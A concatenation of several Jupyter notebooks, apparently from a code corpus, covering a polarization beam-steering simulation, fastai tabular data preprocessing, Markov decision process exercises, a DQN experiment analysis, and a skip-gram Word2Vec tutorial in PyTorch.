path_combi[total_combi+4*i+3,:] = np.array([c[count][1],c[count][0],c[count][0],c[count][1]])
count = count+1
# print(path_combi[0:10,:])
path_gain = np.zeros((num_path,realization)) # 2 to save the position and maximum value
for reali in range(realization):
for combi in range(num_path):
path_gain[combi,reali] =\
(np.abs\
((np.cos(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hh[path_combi[combi,0],reali]+np.sin(ele_rot[reali])*alpha_vh[path_combi[combi,0],reali])*(path_combi[combi,0]==path_combi[combi,1])+\
(np.cos(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hv[path_combi[combi,2],reali]+np.sin(ele_rot[reali])*alpha_vv[path_combi[combi,2],reali])*(path_combi[combi,2]==path_combi[combi,1])+\
(-np.sin(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hh[path_combi[combi,0],reali]+np.cos(ele_rot[reali])*alpha_vh[path_combi[combi,0],reali])*(path_combi[combi,0]==path_combi[combi,3])+\
(-np.sin(ele_rot[reali])*np.cos(azi_rot[reali])*alpha_hv[path_combi[combi,2],reali]+np.cos(ele_rot[reali])*alpha_vv[path_combi[combi,2],reali])*(path_combi[combi,2]==path_combi[combi,3])
))**2
print(num_path)
print(path_gain.shape)
print(alpha_hh.shape)
```
__Check maximum gain from combination of path in each realization__
To do the joint polar beam steering later
```
index = np.zeros(realization,dtype=int)
for reali in range(realization):
index[reali] = np.argmax(path_gain[:,reali])
```
__Create the Cross and Co Polar Index__
```
cross_index = []
samepolar_index = []
count = total_combi-1
while (count<num_path-4):
cross_index.extend([count+3,count+4])
samepolar_index.extend([count+1,count+2])
count = count + 4
cross_index = np.array(cross_index)
samepolar_index = np.array(samepolar_index)
sameclus_index = np.arange(0,total_combi)
print(cross_index)
print(samepolar_index)
print(sameclus_index)
cross_index_in = np.isin(index, cross_index)
samepolar_index_in = np.isin(index, samepolar_index)
sum_cross = sum(cross_index_in)
sum_co = sum(samepolar_index_in)
sum_sameclus = 1000 - sum(samepolar_index_in) - sum(cross_index_in)
print('Number of Cross Index chosen in 1000 realization: ',sum_cross)
print('Number of Same Polar Index chosen in 1000 realization: ',sum_co)
print('Number of Same Cluster Index chosen in 1000 realization: ',sum_sameclus)
nu_path_sameclus = total_combi
nu_path_copolar = total_combi*(total_combi-1)
nu_path_crpolar = total_combi*(total_combi-1)
print(nu_path_sameclus)
print(nu_path_copolar)
print(nu_path_crpolar)
print(num_path)
```
__Plot Distribution of Index Chosen__
```
fig = plt.figure(figsize=(10,4), dpi=200)
n, bins, patches = plt.hist(index, bins=range(0,num_path+1),facecolor='green', alpha=0.75)
# ,edgecolor='black'
# print(n.shape)
# print(bins.shape)
# print(n)
# print(bins)
for i in range(0,total_combi):
patches[i].set_fc('r')
for j in cross_index:
patches[j].set_fc('b')
cluster_same = mpatches.Patch(color='red', label='Same Cluster')
cross_polar = mpatches.Patch(color='blue', label='Cross polar steering')
diff_clus_same_polar = mpatches.Patch(color='green', label='Diff Cluster - Same Polar')
plt.legend(handles=[cluster_same,cross_polar,diff_clus_same_polar])
plt.title('Histogram of chosen path from diffent kind of combination')
plt.show()
unique, counts = np.unique(index, return_counts=True)
print(dict(zip(unique, counts)))
```
__PieChart__
```
fig = plt.figure(figsize=(10,4), dpi=80)
the_grid = GridSpec(1, 2)
colors = ['yellowgreen', 'gold', 'lightskyblue', 'lightcoral']
labels = 'SameRay', 'DiffClus Co-Polar', 'DiffClus Cr-Polar'
chosen_max = [sum_sameclus, sum_co, sum_cross]
num_in_totalpath = [nu_path_sameclus,nu_path_copolar,nu_path_crpolar]
explode = (0, 0, 0)
plt.subplot(the_grid[0, 0], aspect=1)
plt.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
patches, texts,autotexts = plt.pie(num_in_totalpath, explode=explode,colors=colors, autopct='%1.1f%%',shadow=True, startangle=90)
for t in texts:
t.set_size('x-large')
for t in autotexts:
t.set_size('x-large')
plt.title("Path Combinations",fontsize = 20)
plt.subplot(the_grid[0, 1], aspect=1)
plt.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
patches, texts,autotexts = plt.pie(chosen_max, explode=explode,colors=colors, autopct='%1.1f%%',shadow=True, startangle=90)
for t in texts:
t.set_size('x-large')
for t in autotexts:
t.set_size('x-large')
plt.legend(patches,labels,bbox_to_anchor=[0.22, 0.3], loc="best",prop={'size': 15})
plt.title("Effective Channel Gain Maximum",fontsize=20)
plt.show()
```
### Distribution of each kind of combination by simulation
__Index of Same Cluster Max__
```
index_sameclus = np.zeros(realization,dtype=int)
for reali in range(realization):
index_sameclus[reali] = np.argmax(path_gain[0:total_combi,reali])
gain_sameclus = np.zeros(realization,dtype=float)
for reali in range(realization):
gain_sameclus[reali] = path_gain[index_sameclus[reali],reali]
```
__Index of Different Cluster-Cross Polar Max__
```
cross_index
index_diffclus_crosspol = np.zeros(realization,dtype=int)
for reali in range(realization):
index_diffclus_crosspol[reali] = np.argmax(path_gain[cross_index,reali])
gain_diffclus_crosspol = np.zeros(realization,dtype=float)
for reali in range(realization):
gain_diffclus_crosspol[reali] = path_gain[cross_index[np.argmax(path_gain[cross_index,reali])],reali]
```
__Index of Different Cluster-Same Polar Max__
```
samepolar_index
index_diffclus_samepol = np.zeros(realization,dtype=int)
for reali in range(realization):
index_diffclus_samepol[reali] = np.argmax(path_gain[samepolar_index,reali])
gain_diffclus_samepol = np.zeros(realization,dtype=float)
for reali in range(realization):
gain_diffclus_samepol[reali] = path_gain[samepolar_index[np.argmax(path_gain[samepolar_index,reali])],reali]
```
### Plot the Distribution
```
fig = plt.figure(figsize=(20,16), dpi=30)
plt.subplot(3, 1, 1)
plt.title('Same ray ', fontsize = 42)
sns.distplot(gain_sameclus,bins=150, kde = False)
plt.xlim(0,60)
plt.tick_params(axis='both', which='major', labelsize=42)
print('Average of Same Cluster Gain Distribution:',np.mean(gain_sameclus))
plt.axvline(np.mean(gain_sameclus)-1, color='r', linestyle='solid',label="Mean Value")
plt.legend(fontsize=42)
plt.subplot(3, 1, 2)
plt.title('Different ray - Cross polarization', fontsize = 42)
sns.distplot(gain_diffclus_crosspol,bins=100, kde = False)
plt.xlim(0,60)
plt.tick_params(axis='both', which='major', labelsize=42)
plt.axvline(np.mean(gain_diffclus_crosspol)-1, color='r', linestyle='solid',label="Mean Value")
plt.legend(fontsize=42)
print('Average of Different Cluster - Cross polar Distribution:',np.mean(gain_diffclus_crosspol))
plt.subplot(3, 1, 3)
plt.title('Different ray - Same polarization', fontsize = 42)
sns.distplot(gain_diffclus_samepol,bins=100, kde = False)
plt.xlim(0,60)
plt.tick_params(axis='both', which='major', labelsize=42)
plt.axvline(np.mean(gain_diffclus_samepol)-1, color='r', linestyle='solid',label="Mean Value")
plt.legend(fontsize=42)
plt.tight_layout()
print('Average of Different Cluster - Same polar Gain Distribution:',np.mean(gain_diffclus_samepol))
# fig = plt.figure(figsize=(20,20), dpi=50)
# plt.subplot(2, 1, 1)
# plt.title('Same Cluster - Different Cluster Cross polar', fontsize = 28)
# sns.distplot(gain_sameclus-gain_diffclus_crosspol,bins=180, kde = False)
# plt.xlim(-50,100)
# plt.tick_params(axis='both', which='major', labelsize=20)
# print('Average of Same Cluster Gain Distribution:',np.mean(gain_sameclus))
# plt.subplot(2, 1, 2)
# plt.title('Different Cluster - Cross polar Gain Distribution', fontsize = 28)
# sns.distplot(gain_sameclus-gain_diffclus_samepol,bins=100, kde = False)
# plt.xlim(-50,100)
# plt.tick_params(axis='both', which='major', labelsize=20)
# print('Average of Different Cluster - Cross polar Gain Distribution:',np.mean(gain_sameclus-gain_diffclus_crosspol))
# print(np.count_nonzero(gain_sameclus>gain_diffclus_crosspol)/1000)
# print(np.count_nonzero(gain_sameclus>gain_diffclus_samepol)/1000)
# print(np.count_nonzero(gain_sameclus>np.maximum(gain_diffclus_samepol,gain_diffclus_crosspol))/1000)
```
### Independent Beam Steering Horizontal | Vertical
```
steer_path = np.zeros((2,realization),dtype=int)
for reali in range(realization):
steer_path[0,reali] = np.argmax((np.abs(alpha_hh[:,reali]))**2)
steer_path[1,reali] = np.argmax((np.abs(alpha_vv[:,reali]))**2)
```
### Plot Spectral Efficiency
```
SNR_dB = np.arange(-35,10,5)
SNR = 10**(SNR_dB/10)
smax = SNR.shape[0]
R_cross = np.zeros([smax, realization],dtype=complex)
R_steer = np.zeros([smax, realization],dtype=complex)
R_samecl = np.zeros([smax, realization],dtype=complex)
for reali in range(realization):
_chosen_combi_path = path_combi[index[reali]]
_chosen_steer_path = steer_path[:,reali]
_chosen_sameclus_path = path_combi[index_sameclus[reali]]
W_cross = np.vstack((Ar[:,[_chosen_combi_path[1]],reali],Ar[:,[_chosen_combi_path[3]],reali]))
F_cross = np.vstack((At[:,[_chosen_combi_path[0]],reali],At[:,[_chosen_combi_path[2]],reali]))
W_steer = np.vstack((Ar[:,[_chosen_steer_path[0]],reali],Ar[:,[_chosen_steer_path[1]],reali]))
F_steer = np.vstack((At[:,[_chosen_steer_path[0]],reali],At[:,[_chosen_steer_path[1]],reali]))
W_samecl = np.vstack((Ar[:,[_chosen_sameclus_path[1]],reali],Ar[:,[_chosen_sameclus_path[3]],reali]))
F_samecl = np.vstack((At[:,[_chosen_sameclus_path[0]],reali],At[:,[_chosen_sameclus_path[2]],reali]))
for s in range(smax):
R_cross[s,reali] = np.log2(np.linalg.det(np.eye(Ns)+(SNR[s]/Ns)*np.linalg.pinv(W_cross)@H[:,:,reali]@F_cross@F_cross.conj().T@H[:,:,reali].conj().T@W_cross))
R_steer[s,reali] = np.log2(np.linalg.det(np.eye(Ns)+(SNR[s]/Ns)*np.linalg.pinv(W_steer)@H[:,:,reali]@F_steer@F_steer.conj().T@H[:,:,reali].conj().T@W_steer))
R_samecl[s,reali] = np.log2(np.linalg.det(np.eye(Ns)+(SNR[s]/Ns)*np.linalg.pinv(W_samecl)@H[:,:,reali]@F_samecl@F_samecl.conj().T@H[:,:,reali].conj().T@W_samecl))
x = np.linalg.norm(F_cross,'fro')
print("Ns", Ns , " Frobenius norm FRF*FBB=", x**2)
plt.plot(SNR_dB, (np.sum(R_cross,axis=1).real)/realization, label='joint polarization beam steering')
plt.plot(SNR_dB, (np.sum(R_steer,axis=1).real)/realization, label='independent polarization beam steering')
plt.plot(SNR_dB, (np.sum(R_samecl,axis=1).real)/realization, label='same ray beam steering')
plt.legend(loc='upper left',prop={'size': 10})
plt.xlabel('SNR(dB)',fontsize=12)
plt.ylabel('Spectral Efficiency (bits/s/Hz)',fontsize=12)
plt.tick_params(axis='both', which='major', labelsize=10)
plt.ylim(0,12)
plt.grid()
plt.show()
```
| github_jupyter |
# Tabular data
```
from fastai.gen_doc.nbdoc import *
from fastai.tabular.models import *
```
[`tabular`](/tabular.html#tabular) contains all the necessary classes to deal with tabular data, across two modules:
- [`tabular.transform`](/tabular.transform.html#tabular.transform): defines the [`TabularTransform`](/tabular.transform.html#TabularTransform) class to help with preprocessing;
- [`tabular.data`](/tabular.data.html#tabular.data): defines the [`TabularDataset`](/tabular.data.html#TabularDataset) that handles that data, as well as the methods to quickly get a [`TabularDataBunch`](/tabular.data.html#TabularDataBunch).
To create a model, you'll need to use [`models.tabular`](/tabular.html#tabular). See below for an end-to-end example using all these modules.
## Preprocessing tabular data
First, let's import everything we need for the tabular application.
```
from fastai import *
from fastai.tabular import *
```
Tabular data usually comes in the form of a delimited file (such as .csv) containing variables of different kinds: text/category, numbers, and perhaps some missing values. The example we'll work with in this section is a sample of the [adult dataset](https://archive.ics.uci.edu/ml/datasets/adult) which has some census information on individuals. We'll use it to train a model to predict whether salary is greater than \$50k or not.
```
path = untar_data(URLs.ADULT_SAMPLE)
path
df = pd.read_csv(path/'adult.csv')
df.head()
```
Here all the information that will form our input is in the 14 first columns, and the dependent variable is the last column. We will split our input between two types of variables: categorical and continuous.
- Categorical variables will be replaced by a category - a unique id that identifies them - before they are passed through an embedding layer.
- Continuous variables will be normalized and then directly fed to the model.
Another thing we need to handle are the missing values: our model isn't going to like receiving NaNs so we should remove them in a smart way. All of this preprocessing is done by [`TabularTransform`](/tabular.transform.html#TabularTransform) objects and [`TabularDataset`](/tabular.data.html#TabularDataset).
We can define a bunch of Transforms that will be applied to our variables. Here we transform all categorical variables into categories. We also replace missing values for continuous variables by the median column value and normalize those.
```
procs = [FillMissing, Categorify, Normalize]
```
To split our data into training and validation sets, we use valid indexes
```
valid_idx = range(len(df)-2000, len(df))
```
Then let's manually split our variables into categorical and continuous variables (we can ignore the dependant variable at this stage). fastai will assume all variables that aren't dependent or categorical are continuous, unless we explicitly pass a list to the `cont_names` parameter when constructing our [`DataBunch`](/basic_data.html#DataBunch).
```
dep_var = '>=50k'
cat_names = ['workclass', 'education', 'marital-status', 'occupation', 'relationship', 'race', 'sex', 'native-country']
```
Now we're ready to pass this information to [`TabularDataBunch.from_df`](/tabular.data.html#TabularDataBunch.from_df) to create the [`DataBunch`](/basic_data.html#DataBunch) that we'll use for training.
```
data = TabularDataBunch.from_df(path, df, dep_var, valid_idx=valid_idx, procs=procs, cat_names=cat_names)
print(data.train_ds.cont_names) # `cont_names` defaults to: set(df)-set(cat_names)-{dep_var}
```
We can grab a mini-batch of data and take a look (note that [`to_np`](/torch_core.html#to_np) here converts from pytorch tensor to numpy):
```
(cat_x,cont_x),y = next(iter(data.train_dl))
for o in (cat_x, cont_x, y): print(to_np(o[:5]))
```
After being processed in [`TabularDataset`](/tabular.data.html#TabularDataset), the categorical variables are replaced by ids and the continuous variables are normalized. The codes corresponding to categorical variables are all put together, as are all the continuous variables.
## Defining a model
Once we have our data ready in a [`DataBunch`](/basic_data.html#DataBunch), we just need to create a model to then define a [`Learner`](/basic_train.html#Learner) and start training. The fastai library has a flexible and powerful [`TabularModel`](/tabular.models.html#TabularModel) in [`models.tabular`](/tabular.html#tabular). To use that function, we just need to specify the embedding sizes for each of our categorical variables.
```
learn = get_tabular_learner(data, layers=[200,100], emb_szs={'native-country': 10}, metrics=accuracy)
learn.fit_one_cycle(1, 1e-2)
```
As usual, we can use the [`Learner.predict`](/basic_train.html#Learner.predict) method to get predictions. In this case, we need to pass the row of a dataframe that has the same names of categorical and continuous variables as our training or validation dataframe.
```
learn.predict(df.iloc[0])
```
| github_jupyter |
# Exercise 2: Markov Chains and Markov Decision Processes (MDP)
This exercise deals with the formal handling of Markov chains and Markov decision processes.
## 1) Markov Chain: State Transition
The graph shows the last beer problem.
The nodes show the states.
The arrows define the possible transitions to other states and the numbers besides the arrows define the propability of the corresponding transition.
If you are for example in the state "Inital Beer", with 30% propability you go to have a pizza, with 60% propability you meet friends and with 10% propability you end up sleeping.
Define the state transition probability matrix $\mathcal{P}_{xx'}$ of the graph shown in the figure below!

With $p_k = \begin{bmatrix}
\text{Pr}_k \lbrace \text{Inital Beer} \rbrace \\
\text{Pr}_k \lbrace \text{Meet Friends} \rbrace \\
\text{Pr}_k \lbrace \text{Pizza} \rbrace \\
\text{Pr}_k \lbrace \text{Another Beer} \rbrace \\
\text{Pr}_k \lbrace \text{"Last Beer"}\rbrace \\
\text{Pr}_k \lbrace \text{Sleep} \rbrace \\
\end{bmatrix}^\text{T}$
YOUR ANSWER HERE
## 2 ) Markov Chain: Stationary State
Using $p = p \mathcal{P}$, calculate the stationary state probability.
Please note that the sum of the state propabilities equals one for any specific point in time.
YOUR ANSWER HERE
## 3) Markov Reward Process: Evaluating States
In the following rewards for every state are defined.
Given the reward distribution $r_\mathcal{X}$, calculate the state-values $v_\mathcal{X}$.
The states are defined by:
$\mathcal{X} = \left\lbrace \begin{matrix}
\text{Inital Beer}\\
\text{Meet Friends}\\
\text{Pizza}\\
\text{Another Beer}\\
\text{"Last Beer"}\\
\text{Sleep}\\
\end{matrix}
\right\rbrace$
The rewards are defined by:
$r_\mathcal{X} = \begin{bmatrix}
+1\\
+1\\
+2\\
+1\\
-3\\
0\\
\end{bmatrix}$
The state-value is defined by the state-value Bellman equation: $v_\mathcal{X} = r_\mathcal{X} + \gamma \mathcal{P}_{xx'} v_\mathcal{X}$. Assume that $\gamma = 0.9$ and write a Python program to calculate $v_\mathcal{X}$. Which state is most promising? Why?
Which state is most promising when $\gamma = 0.1$?
YOUR ANSWER HERE
```
import numpy as np
# define given parameters
gamma = 0.1 # discount factor
# YOUR CODE HERE
raise NotImplementedError()
print(v_X)
```
## 4) Markov Decision Process: State Transition
The graph shows an MDP.
The nodes are the states.
In every state you can choose between two actions (Lazy or Productive).
Taken actions impact the state transition probability to the next state.
If you for example have a "Hangover" and decide to be "Productive", there is a 30% chance for you to "Visit Lecture" and a 70% chance to stay in the "Hangover" state.
Define the lazy state transition probabilitiy $\mathcal{P}_{xx'}^{u=\text{Lazy}}$ and the productive state transition probability $\mathcal{P}_{xx'}^{u=\text{Productive}}$ of the graph shown in the figure below.

With $p_k = \begin{bmatrix}
\text{Pr}_k \lbrace \text{Hangover} \rbrace \\
\text{Pr}_k \lbrace \text{Sleep} \rbrace \\
\text{Pr}_k \lbrace \text{More Sleep} \rbrace \\
\text{Pr}_k \lbrace \text{Visit Lecture} \rbrace \\
\text{Pr}_k \lbrace \text{Study}\rbrace \\
\text{Pr}_k \lbrace \text{Pass the Exam} \rbrace \\
\end{bmatrix}^\text{T}$
## 4) Solution
\begin{align}
\mathcal{P}_{xx'}^{u=\text{Lazy}}&=\begin{bmatrix}
0 & 1 & 0 & 0 & 0 & 0\\
0 & 0 & 1 & 0 & 0 & 0\\
0 & 0 & 1 & 0 & 0 & 0\\
0 & 0 & 0 & 0 & 0.8 & 0.2\\
0 & 0 & 1 & 0 & 0 & 0\\
0 & 0 & 0 & 0 & 0 & 1\\
\end{bmatrix}\\
\mathcal{P}_{xx'}^{u=\text{Productive}}&=\begin{bmatrix}
0.7 & 0 & 0 & 0.3 & 0 & 0\\
0 & 0 & 0.4 & 0.6 & 0 & 0\\
0 & 0 & 0.5 & 0 & 0.5 & 0\\
0 & 0 & 0 & 0 & 1 & 0\\
0 & 0 & 0 & 0 & 0.1 & 0.9\\
0 & 0 & 0 & 0 & 0 & 1\\
\end{bmatrix}
\end{align}
## 5) Markov Decision Process: Trivial Policy Evaluation
The rewards for this problem are defined by:
$r_\mathcal{X} = r_\mathcal{X}^{u=\text{Productive}} = r_\mathcal{X}^{u=\text{Lazy}} = \begin{bmatrix}
-1\\
-1\\
-1\\
-1\\
-1\\
0\\
\end{bmatrix}$.
How can we interprete these rewards?
Evaluate both the lazy policy and the productive policy using $\gamma = 0.9$.
Bonus question: Can we evaluate the state-value of $\lbrace x=\text{More Sleep}, u=\text{Lazy}\rbrace$ for an infinite time horizon without the use of the Bellman equation?
YOUR ANSWER HERE
```
import numpy as np
# YOUR CODE HERE
raise NotImplementedError()
# Bonus question: Can we evaluate the state-value of {𝑥=More Sleep,𝑢=Lazy} for an infinite time horizon without the use of the Bellman equation?
# YOUR CODE HERE
raise NotImplementedError()
```
## 6) Action-Value Function Evalution
Now, the policy is defined by:
\begin{align}
\pi(u_k=\text{Productive} | x_k)&=\alpha,\\
\pi(u_k=\text{Lazy} | x_k)&=1-\alpha, \forall x_k \in \mathcal{X}
\end{align}
Calculate action-values for the problem as described using the 'fifty-fifty' policy ($\alpha = 0.5$) according to the Bellman Expectation Equation: $q_\pi(x_k, u_k) = \mathcal{R}^u_x + \gamma \sum_{x_{k+1} \in \mathcal{X}} p^u_{xx'} v_\pi(x_{k+1})$ $\forall x_k, u_k \in \mathcal{X}, \mathcal{U}$.
## 6) Solution
```
import numpy as np
gamma = 0.9
alpha = 0.5
no_states = 6
no_actions = 2
r_X = np.array([-1, -1, -1, -1, -1, 0]).reshape(-1, 1)
q_XU = np.zeros([no_states, no_actions])
# YOUR CODE HERE
raise NotImplementedError()
```
## 7) Markov Decision Problem: Stochastic Policy Evalution
Plot the state-value of the states "Lecture" and "Study" for different $\alpha$. What do we see? Why?
## 7) Solution
```
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('seaborn-talk')
n = 6 # dimension of state space
no_of_samples = 1000
alphas = np.linspace(0, 1, no_of_samples)
v_n_alpha = np.zeros([n, no_of_samples])
# YOUR CODE HERE
raise NotImplementedError()
plt.figure(figsize=[10, 6])
states = ["Hangover", "Sleep", "More Sleep", "Visit Lecture", "Study", "Pass Exam"]
alphas = alphas.flatten()
for state, vnalp in zip(states, v_n_alpha):
ls = '--' if state in ['Visit Lecture', 'Study'] else '-'
plt.plot(alphas, vnalp, ls=ls, label=r"$x=${}".format(state))
plt.legend()
plt.xlabel(r"$\alpha$")
plt.ylabel(r"$v_\pi(x)$")
plt.xlim([0, 1])
plt.ylim([-10, 0])
```
YOUR ANSWER HERE
| github_jupyter |
# Analysis - exp61
- Tuning both MLP and Conv nets. A fuller, all at once, survey of architectures.
```
import os
import csv
import numpy as np
import torch as th
import pandas as pd
from glob import glob
from pprint import pprint
import matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import seaborn as sns
sns.set(font_scale=1.5)
sns.set_style('ticks')
matplotlib.rcParams.update({'font.size': 16})
matplotlib.rc('axes', titlesize=16)
from notebook_helpers import load_params
from notebook_helpers import load_monitored
from notebook_helpers import join_monitored
from notebook_helpers import score_summary
def load_data(path, model, run_index=None):
runs = range(run_index[0], run_index[1]+1)
exps = []
for r in runs:
file = os.path.join(path, f"run_{model}_{r}_monitor.csv".format(int(r)))
try:
mon = load_monitored(file)
except FileNotFoundError:
mon = None
exps.append(mon)
return exps
def load_hp(name):
return pd.read_csv(name, index_col=False)
def find_best(hp, data, window, score="score"):
scores = []
for r, mon in enumerate(exp_61):
if mon is not None:
full = mon[score]
# print(len(full))
selected = full[window[0]:window[1]]
# print(selected)
x = np.mean(selected)
# print(x)
scores.append(x)
else:
scores.append(np.nan)
# print(scores)
best = np.nanargmax(scores)
# print(best)
return hp[best:best+1]
```
# Load data
```
path = "/Users/qualia/Code/azad/data/wythoff/exp61/"
hp_61 = load_hp(os.path.join(path,"grid.csv"))
models = ["DQN_hot1", "DQN_hot2", "DQN_hot3", "DQN_hot4", "DQN_hot5", "DQN_conv1",
"DQN_conv2", "DQN_conv3"]
index = (0, 500)
hp_61[0:1]
x.obj
```
# Plots
## All parameter summary
How's it look overall.
### Timecourse
```
for model in models:
exp_61 = load_data(path, model, run_index=index)
plt.figure(figsize=(6, 3))
for r, mon in enumerate(exp_61):
if mon is not None:
_ = plt.plot(mon['episode'], mon['score'], color='black', alpha=0.4)
_ = plt.ylim(0, 1)
_ = plt.title(model)
_ = plt.ylabel("Optimal score")
_ = plt.xlabel("Episode")
_ = plt.legend(loc="right")
sns.despine()
```
- Still terrible.
# Find the best HP
```
for model in models:
exp_61 = load_data(path, model, run_index=index)
best_hp = find_best(hp_61, exp_61, (450,500))
print(f"{model}:\n{best_hp}\n---")
```
| github_jupyter |
# Skip-gram Word2Vec
In this notebook, I'll lead you through using PyTorch to implement the [Word2Vec algorithm](https://en.wikipedia.org/wiki/Word2vec) using the skip-gram architecture. By implementing this, you'll learn about embedding words for use in natural language processing. This will come in handy when dealing with things like machine translation.
## Readings
Here are the resources I used to build this notebook. I suggest reading these either beforehand or while you're working on this material.
* A really good [conceptual overview](http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/) of Word2Vec from Chris McCormick
* [First Word2Vec paper](https://arxiv.org/pdf/1301.3781.pdf) from Mikolov et al.
* [Neural Information Processing Systems, paper](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) with improvements for Word2Vec also from Mikolov et al.
---
## Word embeddings
When you're dealing with words in text, you end up with tens of thousands of word classes to analyze; one for each word in a vocabulary. Trying to one-hot encode these words is massively inefficient because most values in a one-hot vector will be set to zero. So, the matrix multiplication that happens in between a one-hot input vector and a first, hidden layer will result in mostly zero-valued hidden outputs.
<img src='assets/one_hot_encoding.png' width=50%>
To solve this problem and greatly increase the efficiency of our networks, we use what are called **embeddings**. Embeddings are just a fully connected layer like you've seen before. We call this layer the embedding layer and the weights are embedding weights. We skip the multiplication into the embedding layer by instead directly grabbing the hidden layer values from the weight matrix. We can do this because the multiplication of a one-hot encoded vector with a matrix returns the row of the matrix corresponding the index of the "on" input unit.
<img src='assets/lookup_matrix.png' width=50%>
Instead of doing the matrix multiplication, we use the weight matrix as a lookup table. We encode the words as integers, for example "heart" is encoded as 958, "mind" as 18094. Then to get hidden layer values for "heart", you just take the 958th row of the embedding matrix. This process is called an **embedding lookup** and the number of hidden units is the **embedding dimension**.
<img src='assets/tokenize_lookup.png' width=50%>
There is nothing magical going on here. The embedding lookup table is just a weight matrix. The embedding layer is just a hidden layer. The lookup is just a shortcut for the matrix multiplication. The lookup table is trained just like any weight matrix.
Embeddings aren't only used for words of course. You can use them for any model where you have a massive number of classes. A particular type of model called **Word2Vec** uses the embedding layer to find vector representations of words that contain semantic meaning.
---
## Word2Vec
The Word2Vec algorithm finds much more efficient representations by finding vectors that represent the words. These vectors also contain semantic information about the words.
<img src="assets/context_drink.png" width=40%>
Words that show up in similar **contexts**, such as "coffee", "tea", and "water" will have vectors near each other. Different words will be further away from one another, and relationships can be represented by distance in vector space.
<img src="assets/vector_distance.png" width=40%>
There are two architectures for implementing Word2Vec:
>* CBOW (Continuous Bag-Of-Words) and
* Skip-gram
<img src="assets/word2vec_architectures.png" width=60%>
In this implementation, we'll be using the **skip-gram architecture** because it performs better than CBOW. Here, we pass in a word and try to predict the words surrounding it in the text. In this way, we can train the network to learn representations for words that show up in similar contexts.
---
## Loading Data
Next, we'll ask you to load in data and place it in the `data` directory
1. Load the [text8 dataset](https://s3.amazonaws.com/video.udacity-data.com/topher/2018/October/5bbe6499_text8/text8.zip); a file of cleaned up *Wikipedia article text* from Matt Mahoney.
2. Place that data in the `data` folder in the home directory.
3. Then you can extract it and delete the archive, zip file to save storage space.
After following these steps, you should have one file in your data directory: `data/text8`.
```
with open('data/text8') as f:
text = f.read()
text[:100]
```
## Pre-processing
Here I'm fixing up the text to make training easier. This comes from the `utils.py` file. The `preprocess` function does a few things:
>* It converts any punctuation into tokens, so a period is changed to ` <PERIOD> `. In this data set, there aren't any periods, but it will help in other NLP problems.
* It removes all words that show up five or *fewer* times in the dataset. This will greatly reduce issues due to noise in the data and improve the quality of the vector representations.
* It returns a list of words in the text.
This may take a few seconds to run, since our text file is quite large. If you want to write your own functions for this stuff, go for it!
```
import utils
words = utils.preprocess(text)
words[:30]
print("total number of words {}".format(len(words)))
print("total number of unique words {}".format(len(list(set(words)))))
```
### Dictionaries
Next, I'm creating two dictionaries to convert words to integers and back again (integers to words). This is again done with a function in the `utils.py` file. `create_lookup_tables` takes in a list of words in a text and returns two dictionaries.
>* The integers are assigned in descending frequency order, so the most frequent word ("the") is given the integer 0 and the next most frequent is 1, and so on.
Once we have our dictionaries, the words are converted to integers and stored in the list `int_words`.
```
vocab_to_int, int_to_vocab = utils.create_lookup_tables(words)
int_words = [vocab_to_int[word] for word in words]
```
## Subsampling
Words that show up often such as "the", "of", and "for" don't provide much context to the nearby words. If we discard some of them, we can remove some of the noise from our data and in return get faster training and better representations. This process is called subsampling by Mikolov. For each word $w_i$ in the training set, we'll discard it with probability given by
$$ P(w_i) = 1 - \sqrt{\frac{t}{f(w_i)}} $$
where $t$ is a threshold parameter and $f(w_i)$ is the frequency of word $w_i$ in the total dataset.
$$ P(0) = 1 - \sqrt{\frac{1*10^{-5}}{1*10^6/16*10^6}} = 0.98735 $$
I'm going to leave this up to you as an exercise. Check out my solution to see how I did it.
> **Exercise:** Implement subsampling for the words in `int_words`. That is, go through `int_words` and discard each word given the probablility $P(w_i)$ shown above. Note that $P(w_i)$ is the probability that a word is discarded. Assign the subsampled data to `train_words`.
```
from collections import Counter
import random
import numpy as np
threshold = 1e-5
word_counts = Counter(int_words)
#print(list(word_counts.items())[0]) # dictionary of int_words, how many times they appear
total_count = len(int_words)
freqs = {word: count/total_count for word, count in word_counts.items()}
p_drop = {word: 1 - np.sqrt(threshold/freqs[word]) for word in word_counts}
# discard some frequent words, according to the subsampling equation
# create a new list of words for training
train_words = [word for word in int_words if random.random() < (1 - p_drop[word])]
print(train_words[:30])
```
Now that our data is in good shape, we need to get it into the proper form to pass it into our network. With the skip-gram architecture, for each word in the text, we want to define a surrounding _context_ and grab all the words in a window around that word, with size $C$.
From [Mikolov et al.](https://arxiv.org/pdf/1301.3781.pdf):
"Since the more distant words are usually less related to the current word than those close to it, we give less weight to the distant words by sampling less from those words in our training examples... If we choose $C = 5$, for each training word we will select randomly a number $R$ in range $[ 1: C ]$, and then use $R$ words from history and $R$ words from the future of the current word as correct labels."
> **Exercise:** Implement a function `get_target` that receives a list of words, an index, and a window size, then returns a list of words in the window around the index. Make sure to use the algorithm described above, where you chose a random number of words to from the window.
Say, we have an input and we're interested in the idx=2 token, `741`:
```
[5233, 58, 741, 10571, 27349, 0, 15067, 58112, 3580, 58, 10712]
```
For `R=2`, `get_target` should return a list of four values:
```
[5233, 58, 10571, 27349]
```
def get_target(words, idx, window_size=5):
''' Get a list of words in a window around an index. '''
R = np.random.randint(1, window_size+1)
start = idx - R if (idx - R) > 0 else 0
stop = idx + R
target_words = words[start:idx] + words[idx+1:stop+1]
return list(target_words)
# test your code!
# run this cell multiple times to check for random window selection
int_text = [i for i in range(10)]
print('Input: ', int_text)
idx=5 # word index of interest
target = get_target(int_text, idx=idx, window_size=5)
print('Target: ', target)
```
### Generating Batches
Here's a generator function that returns batches of input and target data for our model, using the `get_target` function from above. The idea is that it grabs `batch_size` words from a words list. Then for each of those batches, it gets the target words in a window.
```
def get_batches(words, batch_size, window_size=5):
''' Create a generator of word batches as a tuple (inputs, targets) '''
n_batches = len(words)//batch_size
# only full batches
words = words[:n_batches*batch_size]
for idx in range(0, len(words), batch_size):
